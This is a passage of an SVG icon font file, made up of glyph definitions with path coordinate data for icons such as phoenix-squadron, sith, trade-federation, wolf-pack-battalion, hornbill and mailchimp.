c2.53027 -0.179688 5.07031 0.0107422 7.61035 -0.0498047c5.16016 -0.120117 10.3301 -0.120117 15.4902 -0.0693359c0.759766 0.00976562 1.51953 -0.0302734 2.2793 -0.0800781c-0.0390625 -0.360352 -0.0693359 -0.720703 -0.0996094 -1.08008
c-1.82031 -0.830078 -3.78027 -1.25 -5.66992 -1.89062c-3.73047 -1.22949 -7.48047 -2.38965 -11.2197 -3.56934c-0.570312 -0.169922 -1.12012 -0.419922 -1.66992 -0.640625c-0.150391 -0.549805 -0.180664 -1.12012 -0.120117 -1.68945
c0.870117 -0.480469 1.81934 -0.810547 2.76953 -1.08984c4.87988 -1.52051 9.73047 -3.14062 14.6299 -4.60059c0.379883 -0.129883 0.780273 -0.269531 1.12988 -0.490234c0.400391 -0.269531 0.230469 -0.790039 0.150391 -1.17969
c-1.66016 -0.129883 -3.30957 -0.0302734 -4.96973 -0.0400391c-5.16992 -0.00976562 -10.3301 0.00976562 -15.5 -0.00976562c-1.61035 -0.0302734 -3.21973 0.0195312 -4.82031 -0.209961c-0.519531 -1.66992 -0.719727 -3.41992 -1.16992 -5.11035
c-0.94043 -3.56934 -1.51953 -7.24023 -2.54004 -10.7793c-0.360352 -0.0107422 -0.709961 -0.0205078 -1.05957 -0.0605469c-0.290039 1.73047 -0.150391 3.48047 -0.150391 5.21973v38.1299c0.0205078 1.78027 -0.0800781 3.58008 0.110352 5.37012zM65.0498 279.67
c1.12012 2.15039 2.08008 4.40039 3.37012 6.45996c-1.82031 -7.55957 -2.91016 -15.2695 -3.62012 -23c-0.799805 -7.70996 -0.849609 -15.4902 -0.540039 -23.2295c1.0498 -19.9404 5.54004 -39.8301 14.2305 -57.8809c2.99023 -5.98926 6.34961 -11.8291 10.5 -17.1094
c6.12012 -7.46973 12.5293 -14.7598 19.8398 -21.0898c4.7998 -4.10059 9.99023 -7.78027 15.54 -10.8008c3.26953 -1.64941 6.50977 -3.38965 9.93945 -4.67969c5.01074 -2.03027 10.1904 -3.60938 15.4209 -4.93945c3.8291 -0.959961 7.7793 -1.41016 11.5195 -2.70996
c5 -1.57031 9.46973 -4.61035 13.0303 -8.43066c4.92969 -5.22949 8.08984 -11.8701 10.2002 -18.6699c0.989258 -2.89941 1.58984 -5.91016 2.16992 -8.91992c0.149414 -0.75 0.219727 -1.51953 0.15918 -2.29004c-6.5 -2.78027 -13.2598 -5.05957 -20.2598 -6.17969
c-4.10938 -0.780273 -8.29004 -0.990234 -12.46 -1.08008c-10.25 -0.240234 -20.4697 1.75977 -30.1201 5.12012c-3.73926 1.41992 -7.48926 2.84961 -11.0293 4.71973c-8.06055 3.83984 -15.6406 8.7002 -22.46 14.46c-2.9209 2.5498 -5.83008 5.12988 -8.40039 8.03027
c-9.16016 9.83008 -16.2998 21.4102 -21.79 33.6494c-2.38965 5.55078 -4.61035 11.1807 -6.37012 16.96c-1.16992 3.94043 -2.36035 7.89062 -3.25977 11.9102c-0.75 2.94043 -1.21973 5.9502 -1.87012 8.91992c-0.459961 2.14062 -0.69043 4.32031 -1.03027 6.48047
c-0.849609 5.42969 -1.2793 10.9297 -1.33008 16.4297c0.110352 6.18066 0.25 12.3701 1.07031 18.5c0.400391 2.86035 0.669922 5.74023 1.15039 8.60059c0.979492 5.69922 2.13965 11.3691 3.70996 16.9297c3.08984 11.6504 7.47949 22.9502 12.6895 33.8398z
M428.78 286.11c1.09961 -1.66016 1.91016 -3.48047 2.7793 -5.26074c2.10059 -4.44922 4.24023 -8.89941 6.02051 -13.4893c7.61035 -18.7607 12.2998 -38.79 13.04 -59.0508c0.0195312 -1.75977 0.0703125 -3.51953 0.110352 -5.29004
c0.129883 -9.56934 -1.27051 -19.0898 -3.18066 -28.4492c-0.729492 -3.58984 -1.54004 -7.16992 -2.58008 -10.6904c-4.04004 -14.7197 -10 -29 -18.4102 -41.7803c-8.20996 -12.5693 -19.0098 -23.5498 -31.8398 -31.4092
c-5.72949 -3.59082 -11.79 -6.64062 -18.0498 -9.19043c-5.78027 -2.19043 -11.71 -4.03027 -17.7998 -5.11035c-6.40039 -1.0498 -12.9102 -1.51953 -19.4004 -1.22949c-7.91992 0.479492 -15.7793 2.07031 -23.21 4.84961
c-1.93945 0.799805 -3.93945 1.45996 -5.83984 2.33008c-0.209961 1.50977 0.25 2.99023 0.530273 4.45996c1.16016 5.74023 3.03027 11.3604 5.7002 16.5801c2.36914 4.50977 5.51953 8.65039 9.45996 11.9004c2.42969 2.0498 5.23926 3.60938 8.15918 4.83008
c3.58008 1.5 7.4707 1.96973 11.2402 2.83008c7.23047 1.70996 14.3701 3.92969 21.1504 7c10.3496 4.64941 19.71 11.3799 27.6494 19.46c1.59082 1.60938 3.23047 3.17969 4.74023 4.86914c3.37012 3.76074 6.70996 7.57031 9.85059 11.5303
c7.47949 10.0703 12.8193 21.5898 16.71 33.4805c1.58008 5.2998 3.20996 10.5996 4.20996 16.0498c0.629883 2.87012 1.04004 5.78027 1.51953 8.67969c0.870117 6.08984 1.58984 12.2207 1.67969 18.3799c0.120117 6.65039 0.140625 13.3203 -0.529297 19.9404
c-0.730469 7.99023 -1.87012 15.96 -3.70996 23.7803z" />
    <glyph glyph-name="phoenix-squadron" unicode="&#xf511;" horiz-adv-x="513" 
d="M96.2402 385.19c46.6699 36.2393 105.91 56.2393 165.04 54.7295c29.6699 0.379883 59.29 -5.37988 87.1699 -15.3701c-24.2002 4.64062 -49.1807 6.35059 -73.6006 2.4502c-43 -5.34961 -83.2598 -27.2305 -112.159 -59.3496
c5.68945 0.989258 10.8096 3.67969 16.0693 5.87988c18.1904 7.88965 37.6006 13.29 57.4004 14.8701c19.7998 2.13965 39.75 0.429688 59.4502 -1.93066c-14.46 -2.79004 -29.2002 -4.58008 -43.1104 -9.60938c-34.5303 -11.1104 -65.46 -33.2607 -86.5498 -62.8203
c-13.8398 -19.7705 -23.7002 -42.9902 -24.7402 -67.3301c-0.349609 -16.54 5.23047 -34.9102 19.8896 -44.1699c11.1309 -6.66016 24.8506 -9.38965 37.6309 -6.75977c15.4893 2.46973 30.1592 8.66992 43.7295 16.3799c11.5498 6.83984 22.7305 14.5898 32.0498 24.3203
c3.7998 3.22949 2.54004 8.47949 2.62988 12.8291c-2.12988 0.34082 -4.39941 1.11035 -6.31934 -0.299805c-9.50684 -5.21094 -25.6035 -12.1191 -35.9307 -15.4199c-20.0693 -6.18945 -42.2793 -8.47949 -62.2793 -0.780273
c12.8301 -1.72949 26.1396 -0.30957 37.8496 5.45996c20.29 9.75 36.9199 25.2705 54.5996 38.8809c27.8408 21.29 57.6406 40.1094 89.1709 55.4697c25.7793 12.0098 53.0898 22.8496 81.8096 24.2002c-15.6797 -13.7607 -32.25 -26.6006 -46.9199 -41.5107
c-14.5498 -14.04 -27.54 -29.5791 -40.2305 -45.3096c-3.5293 -4.61035 -8.97949 -6.95996 -13.6201 -10.1904c-22.2393 -15.0293 -40.5996 -35.96 -52.0391 -60.2793c-9.36035 -19.7402 -14.5508 -41.9707 -11.8105 -63.8398
c1.9502 -13.7305 8.74023 -27.6709 20.96 -35.0107c12.9404 -7.98926 29.1396 -8.08984 43.6104 -5.10938c32.8994 7.46973 61.6094 28.9697 81.2793 56c20.5 27.5996 30.6104 62.3799 29.25 96.6396c-0.519531 7.52051 -1.5791 15 -1.66992 22.5498
c8.02051 -19.54 14.8701 -39.8301 16.7002 -61.0098c2.00977 -14.3203 0.75 -28.8398 -1.62012 -43.0195c-1.91992 -11.0205 -5.68945 -21.5801 -7.80957 -32.5303c20.3604 22.7295 34.1699 51.2402 39.46 81.3096c5.71973 35.3701 0.580078 72.3604 -14.25 104.95
c20.8398 -32.1201 32.4297 -69.79 35.8096 -107.8c0.5 -12.7705 0.5 -25.5801 0 -38.3398c-2.90918 -34.2607 -12.9697 -67.9502 -29.7598 -98c-26.2002 -47.4805 -68.2002 -85.8906 -117.54 -108.32c-78.5195 -36.3398 -175.2 -31.4102 -248.72 14.7197
c-38.8398 23.7803 -71.0605 58.3203 -91.6797 98.96c-14.7207 28.8906 -23.4004 60.8203 -25.4404 93.1904v31.4297c3.94043 69.9697 40.9902 136.32 96.2402 178.891zM318.89 304.62c5.51074 0.799805 10.8203 2.57031 16.0205 4.5
c4.99023 1.76953 9.26953 5.9502 10.3496 11.25c-8.91016 -5 -17.9502 -9.9502 -26.3701 -15.75z" />
    <glyph glyph-name="sith" unicode="&#xf512;" 
d="M0 416l118.75 -69.71l-11.5195 58.9004l91.0596 -69.8701c8.5 1.50977 17.0996 2.29004 25.71 2.29004s17.21 -0.770508 25.71 -2.29004l91.0596 69.8701l-11.5195 -58.9004l118.75 69.71l-69.71 -118.75l58.8604 11.5195l-69.8408 -91.0293
c3.04004 -17.0098 3.03027 -34.4404 0 -51.4502l69.8408 -91.0303l-58.8604 11.5205l69.71 -118.78l-118.75 69.71l11.5195 -58.8604l-91.0293 69.8408c-17.0098 -3.04004 -34.46 -3.04004 -51.4805 0l-91.0293 -69.8408l11.5195 58.8604l-118.75 -69.71l69.71 118.78
l-58.8604 -11.5205l69.8408 91.0303c-1.25488 7.04492 -2.27246 18.5693 -2.27246 25.7246c0 7.15625 1.01758 18.6807 2.27246 25.7256l-69.8408 91.0293l58.8604 -11.5195zM224 316.22c-31.7998 0 -63.6104 -12.0898 -87.8496 -36.3398
c-48.4902 -48.4902 -48.5 -127.2 0 -175.7c48.5 -48.4893 127.21 -48.5195 175.699 -0.0292969c48.4902 48.4893 48.5 127.199 0 175.699c-24.25 24.25 -56.0498 36.3701 -87.8496 36.3701zM224 279.56c22.4199 0 44.8301 -8.51953 61.9199 -25.6094
c34.1904 -34.1904 34.1797 -89.6904 0 -123.87c-34.1895 -34.1797 -89.6504 -34.1904 -123.84 0c-34.1904 34.1895 -34.1797 89.6895 0 123.87c17.0898 17.0898 39.5 25.6094 61.9199 25.6094z" />
    <glyph glyph-name="trade-federation" unicode="&#xf513;" horiz-adv-x="496" 
d="M248 439.2c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -43.5996c129.7 0 234.8 105.1 234.8 234.8s-105.1 234.8 -234.8 234.8s-234.8 -105.1 -234.8 -234.8s105.1 -234.8 234.8 -234.8zM403.1 284.9v-0.100586h-145.699
v-34.7998h83.2998v-47h-83.2998v-195.8h-48.8008v196.8h-117.699l-36.7002 46h155.1v81.7002h193.8v-46.7998zM329.8 239.8h-82.8994v56.2002h145v24.4004h-171.801v-80.6006h-143.899l20.0996 -23.8994h123.8v-197.4h26.8008v197.4h82.8994v23.8994zM168.5 308.8l22 9.2998
l-15.7998 -18.0996l15.7002 -18.0996l-22.2002 9.5l-12.2998 -20.5l2.09961 24l-23.2998 5.39941l23.5 5.40039l-2.10059 23.7998zM138.9 328.5l9.5 -10.2002l-13.8008 5.2998l-6.7998 -12.1992l0.799805 14.6992l-13.6992 2.7002l14.2998 3.7998l-1.7002 13.9004
l8 -12.4004l12.7002 5.90039zM304.3 183.3l-9.2998 -10.7998l9.40039 -10.7002l-13.1006 5.5l-7.2998 -12.2002l1.2002 14.2002l-13.9004 3.2002l13.9004 3.2002l-1.2998 14.2002l7.2998 -12.2002zM411.2 260.5l-15 -17.5996l15.0996 -17l-21.2002 8.7998l-11.5 -19.6006
l1.80078 22.9004l-22.2002 4.90039l22.2998 5.39941l-2.2002 22.7002l12 -19.5996zM248 418.1c125.3 0 226.9 -101.6 226.9 -226.899s-101.601 -226.9 -226.9 -226.9s-226.9 101.601 -226.9 226.9s101.601 226.899 226.9 226.899zM342.6 252h-83.1992v30.9004h145.699
v50.6992h-197.8v-81.5996h-157.399l40 -49.9004h116.699v-196.8h52.7002v195.7h83.2998v51zM248 404.8c-94.5996 0 -174.9 -61.5996 -202.9 -146.8h157.4v81.5996h199.1c-38.7998 40.2002 -93.2998 65.2002 -153.6 65.2002zM248 -22.2998c117.9 0 213.5 95.5996 213.4 213.5
c0 51.8994 -18.5 99.5 -49.3008 136.5v-50.7998h-145.6v-19.2002h83.2002v-62.7002h-83.2998v-195.8h-64.6006v196.8h-114.7l-43.7998 56.2998c-5.7998 -19.2998 -8.89941 -39.8994 -8.89941 -61.0996c0 -117.9 95.6992 -213.5 213.6 -213.5zM178.8 173l22.7002 9.2998
l-16.9004 -17.0996l15.8008 -18.7998l-21.5 10.7998l-13 -20.9004l3.69922 23.7998l-23.7998 5.90039l23.7002 3.90039l-1.7002 24.5z" />
    <glyph glyph-name="wolf-pack-battalion" unicode="&#xf514;" horiz-adv-x="456" 
d="M239.73 -23.5303l-11.4307 -21.0996l-11.4395 21.1104l-10.5605 -15.8408l-5.28027 12.3203l-5.2793 -7.04004v-29.9102c-21.0605 7.91992 -21.1104 66.8604 -25.5098 97.21c-4.62012 31.8799 0.879883 92.8105 -81.3701 149.11
c8.87988 23.5996 12 49.4297 2.63965 80.0498c-27.8701 -3.33008 -53.9404 -10.5801 -63.3398 -54.0996l30.3496 -8.36035c-11.1494 -23.04 -17.0195 -46.7598 -13.2002 -72.1396l27.2705 7.04004l6.16016 -33.4307l18.4697 7.04004l8.7998 -33.4297l19.3398 7.0498
l-26.3896 -21.1094l-8.7998 28.1494l-24.6299 -5.28027l-7.04004 35.6309l-26.3906 -14.5205c-0.25 20.0205 -6.95996 58.0605 8.80078 84.4502l-26.3906 -5.28027c-3.99023 22.0703 2.37988 39.21 7.91992 56.7402l-22.4297 -9.67969
c0.44043 25.0693 29.9404 56.79 61.5898 58.5098c20.2197 1.08984 56.7305 25.1602 54.1006 51.8994c-1.95996 19.8701 -17.4502 42.6201 -43.1104 49.7002c43.9795 -36.5098 9.67969 -67.2998 -5.28027 -73.46c-4.39941 11.4404 -17.54 69.0801 0 130.2
c40.4697 -22.8701 89.7305 -65.0996 93.25 -147.81l58.0605 -38.71l3.51953 -93.25l-107.33 59.8193l-7.04004 -7.04004l17.5898 -3.51953l43.9902 -38.71l15.8398 5.2793l28.1504 -49.2598l3.51953 -119.64l-21.1094 -15.8398l32.5498 -15.8398l32.5498 15.8398
l-21.1094 15.8398l3.51953 119.64l28.1504 49.2598l15.8398 -5.2793l43.9902 38.71l17.5898 3.51953l-7.04004 7.04004l-107.33 -59.8193l3.51953 93.25l58.0605 38.71c3.51953 82.6895 52.7793 124.92 93.25 147.79c17.54 -61.1201 4.39941 -118.761 0 -130.2
c-14.96 6.16016 -49.2705 36.9502 -5.28027 73.46c-25.6602 -7.08008 -41.1504 -29.8301 -43.1104 -49.7002c-2.63965 -26.7305 33.8799 -50.8096 54.1006 -51.9004c31.6396 -1.70996 61.1396 -33.4297 61.5801 -58.5l-22.4307 9.68066
c5.54004 -17.5303 11.9102 -34.6699 7.91992 -56.7402l-26.3896 5.28027c15.7705 -26.3906 9.0498 -64.4307 8.7998 -84.4502l-26.3896 14.5195l-7.04004 -35.6299l-24.6299 5.28027l-8.7998 -28.1504l-26.3906 21.1104l19.3506 -7.04004l8.7998 33.4297l18.4697 -7.04004
l6.16016 33.4307l27.2803 -7.05078c3.80957 25.3809 -2.0498 49.1006 -13.2002 72.1406l30.3496 8.35938c-9.39941 43.5205 -35.4697 50.7607 -63.3398 54.1006c-9.35938 -30.6201 -6.24023 -56.4404 2.64062 -80.0498c-82.25 -56.3008 -76.75 -117.221 -81.3701 -149.11
c-4.40039 -30.3496 -4.4502 -89.29 -25.5107 -97.21v29.9102l-5.2793 7.04004l-5.28027 -12.3203zM318.9 71.4805l-15.8408 10.5596c7.4707 4.36035 13.7607 8.41992 19.3506 12.3203c-0.600586 -7.26074 -0.270508 -13.8799 -3.50977 -22.8799zM347.05 120.74
c-0.399414 -10.9404 -0.899414 -21.6602 -1.75977 -31.6699c-7.84961 1.85938 -15.5703 3.7998 -21.1104 7.04004c8.24023 7.89941 15.5508 16.2695 22.8701 24.6299zM371.68 115.46l-23.75 6.16016c7.24023 9.08984 13.0898 18.1797 18.4707 27.2695
c3.22949 -9.21973 5.25977 -20 5.2793 -33.4297zM375.2 196.4c19.4395 -12.8105 27.7998 -33.6602 29.9102 -56.3008c-12.3203 4.53027 -24.6299 9.31055 -36.9502 10.5605c5.05957 11.9902 6.64941 28.1396 7.04004 45.7402zM373.44 242.14
c18.5293 -2.62988 35.1494 -9.19922 45.75 -28.1494c-14.21 -4.36035 -24.7705 -5.9707 -43.9902 -14.0801c0.0800781 13.4102 -0.950195 27.9297 -1.75977 42.2295zM137.68 71.4805c-3.23926 9 -2.91016 15.6191 -3.50977 22.8799
c5.58984 -3.90039 11.8799 -7.95996 19.3496 -12.3203zM109.53 120.74c7.31934 -8.36035 14.6299 -16.7305 22.8701 -24.6299c-5.54004 -3.24023 -13.2607 -5.18066 -21.1104 -7.04004c-0.860352 10.0098 -1.36035 20.7295 -1.75977 31.6699zM84.8896 115.46
c0.0205078 13.4297 2.05078 24.21 5.28027 33.4297c5.37988 -9.08984 11.2305 -18.1797 18.4697 -27.2695zM81.3701 196.4c0.389648 -17.6006 1.99023 -33.75 7.04004 -45.7402c-12.3203 -1.25 -24.6299 -6.03027 -36.9502 -10.5605
c2.11035 22.6406 10.4697 43.4902 29.9102 56.3008zM83.1299 242.14c-0.80957 -14.2998 -1.83984 -28.8193 -1.75977 -42.2295c-19.2197 8.10938 -29.7803 9.71973 -43.9902 14.0801c10.6104 18.9502 27.2197 25.5195 45.75 28.1494z" />
    <glyph glyph-name="hornbill" unicode="&#xf592;" horiz-adv-x="509" 
d="M75.3701 77.7002c2.13965 -15.8301 -5.77051 -31.9805 -20.9404 -39.29c-18.8496 -9.10059 -41.5498 -1.16992 -50.6797 17.6797c-9.08008 18.8301 -1.12988 41.5801 17.7002 50.6504c7.0498 3.39941 14.6299 4.41992 21.8496 3.37988
c-78.2803 111.35 52 190.53 52 190.53c-5.85938 -43.04 -8.24023 -91.1602 -8.24023 -91.1602c-67.3096 -41.4502 0.920898 -64.0605 39.8105 -72.8701c19.7695 -53.6201 71.1797 -91.9404 131.66 -91.9404c1.91992 0 3.76953 0.209961 5.66992 0.280273l0.109375 -18.8604
c-99.2197 -1.38965 -158.699 29.1406 -188.939 51.6006zM183.38 405.4c109.75 73.9697 187.59 -54.0508 187.59 -54.0605c-43.04 5.86035 -91.1797 8.24023 -91.1797 8.24023c-43.0996 70.0098 -65.8301 -6.54004 -73.8398 -44.29
c-51.4805 -20.8301 -87.8506 -71.21 -87.8506 -130.16c0 -0.910156 0.120117 -1.78027 0.140625 -2.67969l-21.8398 -0.150391c-1.41016 100.46 29.8691 160.12 52.4199 190.03c-15.1602 -1.19043 -30.2002 6.75977 -37.1807 21.2295
c-9.10938 18.8506 -1.16992 41.5801 17.6904 50.6807c18.8398 9.08984 41.5596 1.14941 50.6602 -17.6904c3.29004 -6.81934 4.2793 -14.1494 3.38965 -21.1494zM487.56 271.23c-6.23926 -3.01074 -12.8799 -4 -19.3096 -3.5c84.4902 -113.45 -48.96 -194.61 -48.96 -194.61
c5.87012 43.0303 8.20996 91.1602 8.20996 91.1602c66.5996 40.96 0.639648 63.5195 -38.46 72.54c-20.5898 51.96 -71.1904 88.7598 -130.49 88.7598c-2.75 0 -5.43945 -0.259766 -8.13965 -0.410156l-0.140625 22.5c93.6104 1.31055 151.74 -25.7998 183.45 -47.7402
c-2.31934 15.9502 5.60059 32.2705 20.8701 39.6406c18.8398 9.08008 41.5703 1.16016 50.6699 -17.6904c9.11035 -18.8398 1.14062 -41.5596 -17.7002 -50.6494zM373.05 11.7598c14.1904 0.0800781 27.8906 -7.72949 34.4502 -21.3496
c9.08984 -18.8203 1.16016 -41.5498 -17.7002 -50.6504c-18.8398 -9.06934 -41.5801 -1.17969 -50.6396 17.71c-2.19043 4.52051 -3.33008 9.25 -3.64062 13.9707c-111.979 -80.3701 -191.899 50.9697 -191.899 50.9697c43.0703 -5.87988 91.1895 -8.21973 91.1895 -8.21973
c41.3301 -67.1709 63.9209 0.540039 72.7705 39.4893c53.3398 19.9004 91.3896 71.1807 91.3896 131.45c0 2.08008 -0.219727 4.08984 -0.299805 6.15039l19.5205 0.139648c1.2793 -89.9697 -23.71 -147.2 -45.1406 -179.66z" />
    <glyph glyph-name="mailchimp" unicode="&#xf59e;" horiz-adv-x="428" 
d="M222.7 374.8c-2.2002 -1.39941 -4.40039 -2.7998 -6.40039 -4.2002l-3.59961 12.6006zM100.9 133.6c3.5 -2.69922 12.7998 -4.69922 14.6992 -14.1992c1.90039 -10.8008 -6 -20.5 -15.5 -20.7002c-6.69922 -0.200195 -10.3994 4 -9.69922 4.89941
c0.299805 0.400391 1.2998 0.200195 2.89941 0c8.5 -1.2998 13.7002 3.90039 14.9004 9.30078c0 0 0.299805 1.5 0.299805 2.5c0 0.899414 -0.0996094 1.7998 -0.200195 2.59961c-1 5.7002 -7.39941 6.7002 -11.5996 11.2002c-3.7998 4 -3 9.2002 -0.700195 11.7002
c2.7998 2.7998 6.7998 1.7998 6.7998 0.799805c0 -0.5 -1 -0.900391 -2.2002 -1.7002c-1.59961 -1.09961 -1.7998 -2.2002 -1.39941 -4c0.299805 -1 0.700195 -1.59961 1.7002 -2.40039zM105.4 144c-3.2002 4.5 -10.4004 8.7998 -20.2002 6.59961
c-1.7998 -0.399414 -0.799805 -0.199219 -2.60059 -0.699219c-0.299805 0 -0.5 -0.100586 -0.799805 -0.200195c-0.599609 -0.200195 -1.09961 -0.400391 -1.59961 -0.700195c-0.400391 -0.299805 -4 -1.90039 -7 -5.5c-4 -5 -5.40039 -11.5 -5.2002 -17.7002
c0.200195 -6 2 -9.39941 2.2998 -10.2002c1.40039 -3 -1.89941 -3.59961 -4.7998 -0.399414c-2.40039 2.5 -3.90039 6.2998 -4.59961 9.7002c-3 14 3.19922 28 17.5996 33.5996c0.799805 0.299805 1.7002 0.5 2.5 0.700195c1.5 0.5 6.7002 1.5 12.0996 0.700195
c5.80078 -0.900391 11 -3.90039 14.3008 -7.7002c2.5 -2.7998 4.39941 -6.90039 4.09961 -10.5c-0.0996094 -1.5 -0.799805 -3.60059 -2.09961 -4.2002c-0.5 -0.299805 -1.10059 -0.200195 -1.40039 0.200195c-1 1 -0.200195 2.89941 -2.59961 6.2998zM201.7 379.4
l-6.10059 2l-1.69922 6.89941l2.89941 8.7998zM212.4 367.8c-2.7002 -1.7998 -5 -3.59961 -7 -5.09961l-13.6006 11.3994zM303.8 182.5c-3.5 1.90039 -5.2002 5.59961 -3.89941 8.2002c1.39941 2.59961 5.5 3.2002 9 1.2002
c3.59961 -1.90039 5.2998 -5.60059 3.89941 -8.2002c-1.39941 -2.60059 -5.5 -3.2002 -9 -1.2002zM266.1 184.2c-5.19922 0.399414 -10.6992 0.299805 -18.3994 -2.90039c-2.2998 -1 -3.7998 -1.7002 -4.40039 -1.2002c-0.700195 0.5 -0.0996094 2.40039 2.10059 4.5
c1.89941 1.80078 3.89941 2.90039 6.09961 3.80078c0.299805 0.199219 0.700195 0.299805 1.09961 0.399414c1 0.299805 2.10059 0.600586 3.2002 0.799805c9.10059 1.5 15.7998 -3.5 14.9004 -5c-0.400391 -0.699219 -2.10059 -0.599609 -4.60059 -0.399414zM426.6 124.3
c5.30078 -12.8994 -5.19922 -28.3994 -5.19922 -28.3994c-0.400391 -1.2002 -33.3008 -127.9 -162.9 -127.9c-112 0 -165.1 97.4004 -165.1 97.4004c-8.2002 -0.5 -16 0.799805 -23.3008 3.5c-32.8994 12.0996 -48.5996 49.6992 -37.2998 81.1992l-18.0996 13.8008
c-69.9004 53.2998 128.3 297.199 198.5 242c0.299805 -0.300781 16.7002 -13.5 16.7002 -13.5c25.0996 15.1992 50 23.5 70.2998 23.5c14.3994 0 26.3994 -4.10059 34.5 -12.9004c18.2002 -19.7002 11.5996 -57.2998 -13.2002 -95.4004
c5.2998 -5.09961 9.7002 -12 12.9004 -18.7998c7.89941 -6 13.0996 -15.2998 15.5996 -28.0996c2.7998 -14.2002 3.40039 -34.5 5.2002 -43.2002c6.7002 -3 3.89941 -1.59961 11 -5.2002c7.39941 -3.7002 16.5 -8.2998 26.5 -17.8994
c17.7998 -4.40039 24.5996 -23.4004 14.2002 -36.3008c-0.200195 -0.299805 -1.5 -1.7998 -2.80078 -3.2998c0.300781 -0.799805 3.7002 -6.2998 6.2002 -17.5996c7.2998 -1.7998 13.2002 -6.2998 16.2998 -12.9004zM20.0996 180.1
c2.40039 -4.09961 19.3008 -16.5 19.4004 -16.5c6.59961 9.10059 14.0996 15.8008 21.7002 20h-0.700195c15.2998 53.3008 56.2998 108 98.0996 143.7c10.4004 8.90039 31.4004 23 31.4004 23l-23.9004 20.7998l-1.69922 12.1006l32.5996 -26.9004
c-1.40039 -1.2002 -2.90039 -2.39941 -4.40039 -3.7002c-3.2998 -2.69922 -6.5 -5.59961 -9.69922 -8.59961c-4.60059 -4.2998 -9.30078 -8.90039 -13.9004 -13.7002c-9.90039 -10.2002 -19.5996 -21.3994 -28.7002 -32.7998
c-16 -20.2002 -22.7002 -29.7002 -32.8994 -48.9004c-0.100586 -0.0996094 55.5996 66.6006 69.3994 80.3008c25.4004 25.1992 67 53.2998 67.4004 53.5c17.7998 10.7998 32.7998 17.1992 45.0996 20c-20.2002 -2 -41.7998 -12.4004 -58.7998 -22.6006
c0 0.100586 -24.7002 20.9004 -24.7002 20.9004l-9 -3.5c-32.7998 7.7002 -105.1 -46.7998 -148.6 -115.9c-17.6006 -28 -42.2998 -77.2002 -28.1006 -101.2zM89.2002 80c28.2002 0 49.5996 26.7998 44.3994 56.2002c0 0 -2.7998 -6.7002 -5.5 -10.2998
c0.700195 10.5 -1 20.8994 -4.19922 30.7998c0 0 -1.40039 -5.90039 -4.2002 -13.1006c-2.7002 22.9004 -12.2998 27.8008 -12.2998 27.8008c-5.5 2.59961 -11.7002 4 -18.2002 4c-25 0 -45.2998 -21.3008 -45.2998 -47.7002c0 -26.2998 20.2998 -47.7002 45.2998 -47.7002z
M145 248.5c12.7002 16.5 29 32.2998 51.4004 46.9004c48.7998 31.5996 97.5 35.1992 114.199 22.3994c0 0.100586 -0.299805 0.799805 -0.399414 1c-4.2998 9 -14.2002 15.2998 -23 17.7998c1.59961 -1.59961 3.7998 -4.5 4.7002 -6.2998
c-6.60059 4.60059 -15.5 8.60059 -24.7002 10.5c0 0 1.09961 -0.799805 1.2998 -1c1.7998 -1.7002 4.2998 -4.39941 5.2998 -6.7002c-8.7998 3.60059 -20 5.5 -29.5 3.7002l-1.2002 -0.299805s1.2002 -0.299805 1.5 -0.400391c3.2002 -0.899414 7.7002 -2.89941 9.7002 -5.5
c-15.8994 2.80078 -33.2998 -0.299805 -42.7002 -5.5h2.2002c3.40039 -0.0996094 10.4004 -0.5 13.2998 -2.39941c-10 -2 -24.3994 -6.5 -32.1992 -13.2002c1.39941 0.0996094 9.19922 1.09961 12.3994 0.599609c-42.7998 -24.5 -62.2998 -61.5996 -62.2998 -61.5996z
M408.4 102.2c8.59961 10.2998 6.19922 20.5 -5.10059 20.5c-3.7002 0 -6.39941 -1 -6.39941 -1s0 15.0996 -7 26.8994c-5.40039 -6.09961 -20.4004 -18.0996 -40 -27.3994c-18.4004 -8.7002 -43 -16.4004 -73.5 -17.4004
c-8.60059 -0.299805 -13.8008 1.10059 -16.8008 -8.89941c-0.299805 -0.900391 -0.399414 -1.90039 -0.5 -2.90039c33.4004 -10.5 86.3008 10 91.4004 11.2002c0.200195 0.0996094 0.400391 0.0996094 0.5 0.0996094c3.2998 -0.200195 -28.2998 -20.2002 -72.2998 -20.2002
c-7.40039 0 -13.9004 0.700195 -18.9004 1.7002c2.5 -8.2002 8.7002 -11.8994 17 -13.7998c6.2002 -1.5 12.9004 -1.59961 12.9004 -1.59961c60.8994 -1.7002 111 45.5 113.1 47.8994c0 0 -0.5 -1.2002 -0.599609 -1.39941c-9 -20 -60.6006 -56.4004 -112.101 -55.4004
l-0.199219 -0.0996094c-12 0.0996094 -26.5 3.09961 -34 12.5c-11.9004 14.7998 -5.7002 39.3994 13.2998 40c0 0 4.39941 0.0996094 6.2998 0.0996094c47 1.40039 89.2998 18.7002 119.5 54.7998c4.09961 5.2002 -0.5 12.2998 -9.5 12.5h-0.0996094l-0.100586 0.100586
c-10.7002 11.3994 -20 15.5 -28.3994 19.6992c-17.5 8.90039 -15.8008 1.2002 -19.9004 44.5c-1.09961 11.7002 -3.40039 27.6006 -13.5996 33.7002c-2.7002 1.60059 -5.7002 2.2998 -8.7002 2.2998s-4.5 -0.699219 -5.10059 -0.799805
c-5.59961 -1.2002 -8.7998 -4.39941 -12.7998 -8.09961c-18.8994 -17.4004 -34.0996 -12.7002 -56.5996 -12.5c-21.1006 0.0996094 -39.7998 -14.6006 -43.4004 -37.2998c-1.7998 -11.9004 -0.700195 -24 1.2002 -29.4004c0 0 -5.7998 3.7998 -8.5 7.2002
c3.2998 -20.7998 22.2002 -34.2998 22.2002 -34.2998c-3 -0.700195 -7.2998 -0.400391 -7.2998 -0.400391s10.6992 -8.5 20.0996 -11.5c-2.40039 -1.5 -14.7002 -13.7002 -21.0996 -30.4004c-5.90039 -15.6992 -3.5 -34.5 -3.5 -34.5l5.19922 7.7002
s-3.2998 -17.2002 3.2002 -33.7998c2.2002 5 6.90039 13.7998 6.90039 13.7998s-0.799805 -18.3994 8.09961 -33.5c0.299805 3.40039 1.60059 12.2998 1.60059 12.2998s5.09961 -15.6992 16.8994 -26.6992c22 -19.5 80.2998 -23.1006 124.7 11.7998
c35.2002 27.5996 41.2998 60.7998 41.9004 62zM259 89v2v-2zM259.7 84.9004c0 0.0996094 -0.100586 0.0996094 -0.100586 0.199219c0 -0.0996094 0 -0.0996094 0.100586 -0.199219c0 0.0996094 -0.100586 0.199219 -0.100586 0.399414
